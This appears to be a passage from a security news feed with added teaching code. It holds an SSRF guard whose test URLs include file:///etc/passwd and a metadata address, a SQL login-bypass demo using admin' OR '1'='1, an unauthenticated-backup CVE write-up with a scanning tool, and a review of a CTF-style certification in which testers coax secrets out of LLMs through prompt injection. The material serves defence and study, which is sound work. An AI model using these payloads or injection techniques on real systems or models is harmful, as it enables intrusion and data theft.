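ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table so the example runs offline. Every hostname here is invented.
CONSTRUCTED_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "127.0.0.1": ["127.0.0.1"],
    "metadata.example": ["169.254.169.254"],          # cloud instance metadata address
    "rebind.example": ["93.184.216.34", "10.0.0.5"],  # one public and one internal record
    "public.example": ["93.184.216.34"],
}


def sample_resolver(host: str) -> list[str]:
    """Offline stand-in for DNS backed by the constructed table above."""
    if host not in CONSTRUCTED_DNS:
        raise socket.gaierror(f"constructed resolver has no record for {host!r}")
    return CONSTRUCTED_DNS[host]


def real_resolver(host: str) -> list[str]:
    """Resolve every A/AAAA record: a host is only safe if all of them are."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_internal_ip(ip: str) -> bool:
    """True for any address a server-side fetcher must never be allowed to reach."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True  # fail closed on anything that is not a clean IP literal
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is really 127.0.0.1
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_fetch_target(url: str, resolver=real_resolver) -> tuple[bool, str]:
    """Return (allowed, reason) for a URL the application is about to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        # http://public.example@127.0.0.1/ fools parsers that stop at the '@'
        return False, "userinfo in URL"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        ips = resolver(host)
    except (socket.gaierror, ValueError) as exc:
        return False, f"cannot resolve {host!r}: {exc}"
    for ip in ips:
        if is_internal_ip(ip):
            return False, f"{host!r} resolves to internal address {ip}"
    return True, f"{host!r} -> {', '.join(ips)}"


if __name__ == "__main__":
    for candidate in ("http://localhost/admin", "http://127.0.0.1",
                      "http://metadata.example/latest/meta-data/",
                      "http://rebind.example/", "https://public.example/page",
                      "file:///etc/passwd", "http://public.example@127.0.0.1/"):
        allowed, reason = check_fetch_target(candidate, sample_resolver)
        print(f"{'ALLOW' if allowed else 'BLOCK':5s} {candidate:45s} {reason}")
```

Validating before the fetch is necessary but not sufficient: a hostname can change its answer between the check and the connection (DNS rebinding), and a 302 from a public host can point back inside, so the fetching code should connect to the address it validated and re-run the check on every redirect.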
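Scenario 4 says the login bypass works because the application puts the input straight into its SQL text. The Python script below is an added example, not code from the original guide: it builds a throwaway SQLite users table (constructed data; the table, user and password are invented), runs the same admin' OR '1'='1 payload against a string-concatenated query and against a parameterized one, and shows why only the first lets you in.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the target's real database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    conn.commit()
    return conn


def rendered_query(username: str, password: str) -> str:
    """What the vulnerable code sends to the database: a quote in the input
    terminates the string literal and the rest is parsed as SQL syntax."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    return conn.execute(rendered_query(username, password)).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders hand the values to the driver separately from the SQL text,
    so a quote in the input is just a character in the compared value."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


PAYLOAD = "admin' OR '1'='1"  # the payload from Scenario 4


if __name__ == "__main__":
    conn = make_db()
    print(rendered_query(PAYLOAD, PAYLOAD))
    # WHERE username = 'admin' OR '1'='1' AND password = 'admin' OR '1'='1'
    # parses as  username='admin' OR ('1'='1' AND password='admin') OR '1'='1',
    # which is true for every row, so the first user (admin) comes back.
    print("vulnerable login with payload:", login_vulnerable(conn, PAYLOAD, PAYLOAD))  # True
    print("fixed login with payload:     ", login_fixed(conn, PAYLOAD, PAYLOAD))       # False
    print("fixed login with real password:",
          login_fixed(conn, "admin", "correct horse battery staple"))                 # True
```

In production code the password is usually hashed before it reaches the query, so the password field is often not injectable at all; the username field, concatenated as above, is where the Scenario 4 payload usually lands. The fix is the same either way: bind every user-supplied value through a placeholder.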
by InfoSec Write-ups
2024-09-01 19:11:45
The Discovery of CVE-2024–5947: Authentication Bypass in Deep Sea Electronics DSE855

Recently, during a routine security assessment, I uncovered a significant flaw in the Deep Sea Electronics DSE855 device. This vulnerability, identified as CVE-2024–5947, is an authentication bypass that allows unauthorized access to sensitive information. Here's how I discovered and explored it.

The Discovery
While examining the target, I focused on the device's web-based interface and noticed a peculiar behavior. The Deep Sea Electronics DSE855 was exposing a configuration backup file at http://xxxxxxxxxx/Backup.bin. This file was accessible without any authentication, raising red flags.

Understanding the Vulnerability
Bug Name: Deep Sea Electronics DSE855 — Authentication Bypass
Bug Priority: Medium
Vulnerable URL: http://xxxxxxx/Backup.bin

CVE Description:
CVE-2024–5947 describes a flaw in the Deep Sea Electronics DSE855's configuration backup handling. The web interface does not require authentication before serving the backup file, so the sensitive information stored in it can be read by anyone who can reach the interface. The issue, documented as ZDI-CAN-22679, allows network-adjacent attackers to retrieve the backup file without proper authorization, potentially exposing data such as stored credentials.

Impact
The exposed backup file can contain sensitive configuration details that could be leveraged by an attacker to compromise the system further. Accessing this file could lead to unauthorized disclosure of credentials and other critical information, increasing the risk of a security breach.

Steps to Reproduce
To confirm the vulnerability, follow these steps:
1. Access the Vulnerable URL: Open the URL in your browser: http://xxxxxxxxx/Backup.bin
2. Observe the File Access: If the backup file downloads without any authentication prompt (the response is the binary backup itself, not a redirect to a login page), the vulnerability is confirmed. Do not open or share its contents beyond what the report needs; the file may contain live credentials.

Automating the Hunt
To streamline the process, I built a Python tool specifically for detecting this vulnerability. You can install it using pip and automate your testing:
Tool POC: CVE-2024–5947 on GitHub
pip install CVE-2024-5947
CVE-2024-5947 --chatid <YourTelegramChatID>
To check a single URL:
CVE-2024-5947 -u http://mytargetprogram.com
To check a list of URLs:
CVE-2024-5947 -i urls.txt

Remediation:
Remove or restrict the unauthenticated Backup.bin endpoint so that the backup download sits behind the device's authentication like the rest of the interface, apply the vendor's fix where one is available, and keep the web interface off untrusted networks in the meantime. Because an exposed backup may already have been fetched, rotate any credentials it contains.

POC by: @karthithehacker
Mail: contact@karthithehacker.com
Website: https://www.karthithehacker.com/

If you're interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.
To enrol in my cybersecurity and bug bounty course, WhatsApp +91 82709 13635.

Connect with me:
Twitter: https://twitter.com/karthithehacker
Instagram: https://www.instagram.com/karthithehacker/
LinkedIn: https://www.linkedin.com/in/karthikeyan--v/
Website: https://www.karthithehacker.com/
Github: https://github.com/karthi-the-hacker/
npmjs: https://www.npmjs.com/~karthithehacker
Youtube: https://www.youtube.com/@karthi_the_hacker

Thank you
Karthikeyan.V

The Discovery of CVE-2024–5947: Authentication Bypass in Deep Sea Electronics DSE855 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
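The reproduction step above is a manual browser check. The following Python script is an added example, not the author's pip tool and not any Deep Sea Electronics code: it requests /Backup.bin without credentials, does not follow redirects, reads only the first 4 KiB, and classifies the response so that a 200 that is really a login page is not reported as a finding. The responses in SAMPLES are constructed, the MIN_BACKUP_BYTES threshold and the HTML heuristics are assumptions, and device.example is a placeholder host.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin

BACKUP_PATH = "Backup.bin"   # the unauthenticated path named in the write-up
MIN_BACKUP_BYTES = 64        # assumption: a shorter body is not a real config backup
READ_LIMIT = 4096            # sample the start of the file; no need to download all of it


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: a bounce to a login page must show up as a 3xx, not as a 200."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url: str, timeout: float = 10.0):
    """Unauthenticated GET; returns (status, headers, first READ_LIMIT bytes of the body)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "backup-exposure-check/1.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers.items()), resp.read(READ_LIMIT)
    except urllib.error.HTTPError as err:
        body = err.read(READ_LIMIT) if err.fp is not None else b""
        return err.code, dict(err.headers.items()), body


def classify(status: int, headers: dict, body: bytes) -> str:
    """'exposed', 'protected' or 'inconclusive' for one response. Heuristics are assumptions."""
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "").lower()
    if status in (401, 403) or 300 <= status < 400:
        return "protected"      # authentication demanded, or redirected (typically to a login form)
    if status != 200:
        return "inconclusive"
    head = body.lstrip().lower()
    if "text/html" in ctype or head.startswith(b"<!doctype") or head.startswith(b"<html"):
        return "protected"      # 200, but the body is an HTML page such as a login form
    if len(body) < MIN_BACKUP_BYTES:
        return "inconclusive"
    return "exposed"


def check(base_url: str, fetcher=fetch) -> str:
    """Check one device base URL; `fetcher` is injectable so the logic can run offline."""
    url = urljoin(base_url.rstrip("/") + "/", BACKUP_PATH)
    try:
        status, headers, body = fetcher(url)
    except (urllib.error.URLError, OSError) as err:
        return f"inconclusive ({err})"
    return classify(status, headers, body)


# Constructed sample responses, not captured from any real device.
SAMPLES = {
    "exposed":  (200, {"Content-Type": "application/octet-stream"}, b"\x00\x01\x02\x03" * 64),
    "login":    (200, {"Content-Type": "text/html"},
                 b"<!DOCTYPE html><html><body><form action=\"/login\">...</form></body></html>"),
    "redirect": (302, {"Location": "/login"}, b""),
    "denied":   (401, {"WWW-Authenticate": "Basic"}, b"Unauthorized"),
}


if __name__ == "__main__":
    for name, resp in SAMPLES.items():
        print(f"{name:9s} -> {classify(*resp)}")
    # Live use against a placeholder host: print(check("http://device.example"))
```

Only "exposed" is worth a report; an "inconclusive" result (odd status, tiny body, connection error) means look at the raw response by hand rather than assume either way.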
by InfoSec Write-ups
2024-09-01 19:11:40
Certified AI/ML Pentester (C-AI/MLPen) Review
Skynet better watch out…
My hard-fought cert…

Before this week, I didn’t even know this existed. I have been casually looking around for any way to certify that I have acquired a certain set of skills in hacking generative AI and LLM apps, to no avail.

Then, one day I was casually scrolling my LinkedIn feed and I came across this:
Certified AI/ML Pentester (C-AI/MLPen) - Review

Lo and behold, The SecOps Group launched this certification back in July! I jumped on it immediately. That 80% discount, on a £250.00 base price ($328.25 USD, and $66 USD when discounted), was too good to pass up. I had to buy a voucher.

It’s also notable that you get one free retake, and your voucher is for life with each purchase.

The Preparation
“But Kelvin,” you say, “what type of prep work did you do if you just heard about the certification this week?”

Well, I’ve basically spent most of 2024 learning how to:
Get LLMs to leak sensitive data
Directly and indirectly inject malicious instructions within prompts
Come up with my own (admittedly a bit outdated now) proof-of-concept attacks on LLMs

But for someone who hasn’t spent the better part of 2024 trying to prevent the takeover of Skynet, where would they go to prepare?

Full disclosure, as of this writing (August 30, 2024), The SecOps Group does not offer any formal training for this exam. They offer mock exams for many of their practical pentesting exams, but one wasn’t yet available for the C-AI/MLPen exam before I decided to go for it.
(Edit: As of 3rd of Sept, 2024, the mock exam for the C-AI/MLPen is now available.)

Thankfully, they don’t leave you hanging, because the promo page tells you everything you need to know:
Pictured: No lies.

They also link you a whole host of pertinent resources. In my honest opinion, the single best resource is Lakera AI’s Gandalf. However, you will be ill prepared if you don’t read and understand the very many other resources they link, and test various attacks across different LLMs and configurations.

If you have the time, inclination, and ability, I’d also recommend engineering your own AI chatbot(s) to test various offensive and defensive techniques. Part of my AI-related studies this year were in engineering various generative AI tools and services to better understand them. I acquired Microsoft’s AI-900 and have even been studying (off and on) for the AI-102 exam. I truly believe this has helped me tremendously.

If you know how to connect your AI to a database, you know how to access that database, and thus intuitively know how to get it to leak that database…

The Exam
What I like most about this exam is that it’s 100% practical.

The C-AI/MLPen is essentially a CTF where you’re given access to 8 different AI models and you take the fictional role of an application pentester tasked with testing each model’s defenses. Each has its own unique configuration, and each will require a different approach to coax out its corresponding flag. You will be using real exploits and malicious payloads.

While there are technically “questions” that you have to answer, the “answers” are the flags you get from getting the different LLMs to divulge their secret, Gandalf-style.

When you first buy a voucher you’re given a VPN file to access the exam environment. I had one brief moment where I had to disconnect and reconnect to the VPN to regain access to the exam environment, but otherwise it was very stable.

The total exam time is 4 hours and 15 minutes, which is fair for what they’re asking from you. It’s points based, and you need at least 60% to pass. Essentially, as long as you get 6 of 8 total flags, you have a high chance of passing. I was able to capture 6 flags early but I was unable to get the final couple, and eventually my exam time ran out. Thankfully, this was still enough to pass.

I should call out that I think I broke one of the AI models to the point that it couldn’t give me the flag even if it wanted to. Without going into too much detail, after a certain point its output was just… wrong, and went well beyond hallucination. While I wasn’t able to retrieve a flag, it was showing me things that I probably shouldn’t have been seeing.

I should also call out that even though I said Lakera AI’s Gandalf is the single best resource for exam takers, the exam itself is by no means as easy as Gandalf. The C-AI/MLPen exam is much, much more difficult.

For example, I’ve done Gandalf at various times over the past few months, and I have always been able to casually get through the flags without much effort. For C-AI/MLPen, none of my usual exploit attempts worked and I had to dig deep and research furiously to come up with solutions.

Conclusion
Would I recommend that anyone interested take this exam?
Yes!

For the price alone, there is very little reason to pass it up. It’s also certainly worth it for the challenge.

Probably my only negative, and I’ll admit it is a bit nitpicky, is the abbreviation of the certification, C-AI/MLPen. It’s a bit much. I’d honestly recommend that The SecOps Group shorten it to “CAIP” or “CAIPen” if they want to keep their usual naming scheme. As someone with several certifications already, I’m trying to reduce the amount of alphabet soup in my email signature.

(Edit: To explain it better, our email and LinkedIn DM signatures are prime real estate. I’m entering mid-career, and I have six IT/cybersecurity certifications right now. I’m a firm believer in only showing five at a time, maximum, but preferably only three or four. So I basically choose which ones I want to advertise with each email and DM I send to people. Each message I send is free advertising for both me (showing off my knowledge/skills) and the cert body (piquing interest in a certification from potential exam takers). The longer the certification’s name, the less likely I’ll want to add it to my signature, and I’m not alone in that sentiment. From a cert body’s perspective, you want as many people showing off your credentials as possible.)

Will this certification get your resume past job-candidate ATS or HR managers’ scrutiny? Most likely not. It’s barely a month old, and our industry is slow to widely adopt newer certifications.

However, there is precious little competition right now in this space for AI pentesting certifications. As far as I’m aware, this is your only way of certifying your skills, outside of sharing your proof-of-concepts on GitHub or getting CVEs attributed to you. Having this in your back pocket can be a great talking point during an interview.

If you’re a web app pentester, AI engineer, or anything IT- or cybersecurity-related, I feel it would be worth it to give this your time.

Thanks for reading!

Certified AI/ML Pentester (C-AI/MLPen) Review was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-09-01 13:54:00
7 password rules to live by in 2024, according to security experts
Here's what the experts recommend when you need to create a new password -- and one rule likely goes against what you're made to do at work.
by ZDNET Security